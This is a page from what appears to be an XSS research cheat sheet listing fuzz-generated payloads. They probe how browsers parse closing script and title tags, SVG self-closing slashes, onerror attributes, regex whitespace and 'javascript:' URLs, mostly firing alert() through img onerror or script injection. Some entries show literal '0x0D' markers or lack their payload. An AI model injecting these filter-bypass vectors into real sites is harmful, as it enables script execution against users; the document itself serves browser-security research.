Cheat Sheet
Generated payloads from fuzz test results. Filter by type, category, or browser.
Found 172 vectors with results
<script>0x0D
a="</script0x09><img src=data: onerror=alert(9)>"0x0D
</script>Covers the valid character set and syntax rules for closing script tags in HTML, including case sensitivity, spacing, and common parsing behaviors.
<script>0x0D
a="</script
><img src=data: onerror=alert(10)>"0x0D
</script>Covers the valid character set and syntax rules for closing script tags in HTML, including case sensitivity, spacing, and common parsing behaviors.
<script>0x0D
a="</script0x0C><img src=data: onerror=alert(12)>"0x0D
</script>Covers the valid character set and syntax rules for closing script tags in HTML, including case sensitivity, spacing, and common parsing behaviors.
<script>0x0D
a="</script0x0D><img src=data: onerror=alert(13)>"0x0D
</script>Covers the valid character set and syntax rules for closing script tags in HTML, including case sensitivity, spacing, and common parsing behaviors.
<script>0x0D
a="</script ><img src=data: onerror=alert(32)>"0x0D
</script>Covers the valid character set and syntax rules for closing script tags in HTML, including case sensitivity, spacing, and common parsing behaviors.
<svg /><style><!--</style><img src onerror=alert(47)>This vector uses SVG to determine which characters cause a self closing tag.
Characters that are may be part of HTML tag names. These are less strict that the first character
Characters that are possible starts of HTML tag names, for use in "custom tags" on https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
Characters that are possible starts of HTML tag names, for use in "custom tags" on https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
Characters that are possible starts of HTML tag names, for use in "custom tags" on https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
Characters that are possible starts of HTML tag names, for use in "custom tags" on https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
Characters that are possible starts of HTML tag names, for use in "custom tags" on https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
/^\s+$/.test(String.fromCodePoint(9)) && alert(9)This vector shows which characters are valid whitespace characters in a \s escape sequence.
/^\s+$/.test(String.fromCodePoint(10)) && alert(10)This vector shows which characters are valid whitespace characters in a \s escape sequence.
/^\s+$/.test(String.fromCodePoint(11)) && alert(11)This vector shows which characters are valid whitespace characters in a \s escape sequence.
/^\s+$/.test(String.fromCodePoint(12)) && alert(12)This vector shows which characters are valid whitespace characters in a \s escape sequence.
/^\s+$/.test(String.fromCodePoint(13)) && alert(13)This vector shows which characters are valid whitespace characters in a \s escape sequence.
/\p{scx=Latin}+/gu.test(String.fromCodePoint(i)) && alert(i)/\w/ui.test(String.fromCodePoint(i)) && alert(i)Regex "word" characters may match Unicode characters that get canonicalized to one of the regular characters too with /ui flags: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Regular_expressions/Character_class_escape#w
<script>0x0D
a="</script/><img src=data: onerror=alert(47)>"0x0D
</script>This vector shows what characters are between the `</script` and `>` while inside script tag
<script>0x0D
a="</script ><img src=data: onerror=alert(32)>"0x0D
</script>This vector shows what characters are between the `</script` and `>` while inside script tag
<script>0x0D
a="</script0x0D><img src=data: onerror=alert(13)>"0x0D
</script>This vector shows what characters are between the `</script` and `>` while inside script tag
<script>0x0D
a="</script0x0C><img src=data: onerror=alert(12)>"0x0D
</script>This vector shows what characters are between the `</script` and `>` while inside script tag
<script>0x0D
a="</script0x09><img src=data: onerror=alert(9)>"0x0D
</script>This vector shows what characters are between the `</script` and `>` while inside script tag
<a id="user_id" href="https:#blah/../../"></a>These characters make the URI scheme parsing break and return plaintext instead of the parsed URL.
<a id="user_id" href="https:%blah/../../"></a>These characters make the URI scheme parsing break and return plaintext instead of the parsed URL.
<a id="user_id" href="https::blah/../../"></a>These characters make the URI scheme parsing break and return plaintext instead of the parsed URL.
<a id="user_id" href="https:<blah/../../"></a>These characters make the URI scheme parsing break and return plaintext instead of the parsed URL.
<<img src onerror=alert(60)>This XSS vector shows what characters can be used before the onerror event.
<img src onerror=alert(9)0x09style=display:block;content-visibility:auto>This XSS vector shows what characters can be used before the onerror event.
<img src onerror=alert(10)
style=display:block;content-visibility:auto>This XSS vector shows what characters can be used before the onerror event.
<img src onerror=alert(12)0x0Cstyle=display:block;content-visibility:auto>This XSS vector shows what characters can be used before the onerror event.
<img src onerror=alert(13)0x0Dstyle=display:block;content-visibility:auto>This XSS vector shows what characters can be used before the onerror event.
<img src onerror=alert(32) style=display:block;content-visibility:auto>This XSS vector shows what characters can be used before the onerror event.
This XSS vector shows what characters can be used before the onerror event.
This XSS vector shows what characters can be used before the onerror event.
This XSS vector shows what characters can be used before the onerror event.
This XSS vector shows what characters can be used before the onerror event.
This XSS vector shows what characters can be used before the onerror event.
<svg //><style><!--</style><img src onerror=alert(47)>This vector uses SVG to determine which characters are ignored following the slash. Since SVG allows a self closing tag.
<svg />><style><!--</style><img src onerror=alert(62)>This vector uses SVG to determine which characters are ignored following the slash. Since SVG allows a self closing tag.
<title>abc</title0x09><img src=x onerror=alert(9)>Characters allowed </title[here]> without breaking the tag from closing.
<title>abc</title
><img src=x onerror=alert(10)><title>abc</title0x0C><img src=x onerror=alert(12)>Characters allowed </title[here]> without breaking the tag from closing.
<title>abc</title0x0D><img src=x onerror=alert(13)>Characters allowed </title[here]> without breaking the tag from closing.
<title>abc</title ><img src=x onerror=alert(32)><div id="x9"><span x="href=0x09>&bbb"></span></div>0x0D
<script>0x0D
window["x9"].innerHTML=window["x9"].innerHTML;0x0D
if (window["x9"].firstChild.getAttribute("href") != null)0x0D
{0x0D
alert(9)0x0D
}0x0D
</script><div id="x10"><span x="href=
>&bbb"></span></div>0x0D
<script>0x0D
window["x10"].innerHTML=window["x10"].innerHTML;0x0D
if (window["x10"].firstChild.getAttribute("href") != null)0x0D
{0x0D
alert(10)0x0D
}0x0D
</script><div id="x12"><span x="href=0x0C>&bbb"></span></div>0x0D
<script>0x0D
window["x12"].innerHTML=window["x12"].innerHTML;0x0D
if (window["x12"].firstChild.getAttribute("href") != null)0x0D
{0x0D
alert(12)0x0D
}0x0D
</script><div id="x13"><span x="href=0x0D>&bbb"></span></div>0x0D
<script>0x0D
window["x13"].innerHTML=window["x13"].innerHTML;0x0D
if (window["x13"].firstChild.getAttribute("href") != null)0x0D
{0x0D
alert(13)0x0D
}0x0D
</script><div id="x32"><span x="href= >&bbb"></span></div>0x0D
<script>0x0D
window["x32"].innerHTML=window["x32"].innerHTML;0x0D
if (window["x32"].firstChild.getAttribute("href") != null)0x0D
{0x0D
alert(32)0x0D
}0x0D
</script>if (new URL("javascript0x09://xss.com").host=="xss.com"){alert(9)}want to test if new URL('javascript://xss.com') can still return the hostname on all characters
if (new URL("javascript+://xss.com").host=="xss.com"){alert(43)}want to test if new URL('javascript://xss.com') can still return the hostname on all characters
if (new URL("javascript-://xss.com").host=="xss.com"){alert(45)}want to test if new URL('javascript://xss.com') can still return the hostname on all characters
if (new URL("javascript.://xss.com").host=="xss.com"){alert(46)}want to test if new URL('javascript://xss.com') can still return the hostname on all characters
if (new URL("javascript0://xss.com").host=="xss.com"){alert(48)}want to test if new URL('javascript://xss.com') can still return the hostname on all characters
Page 1 of 9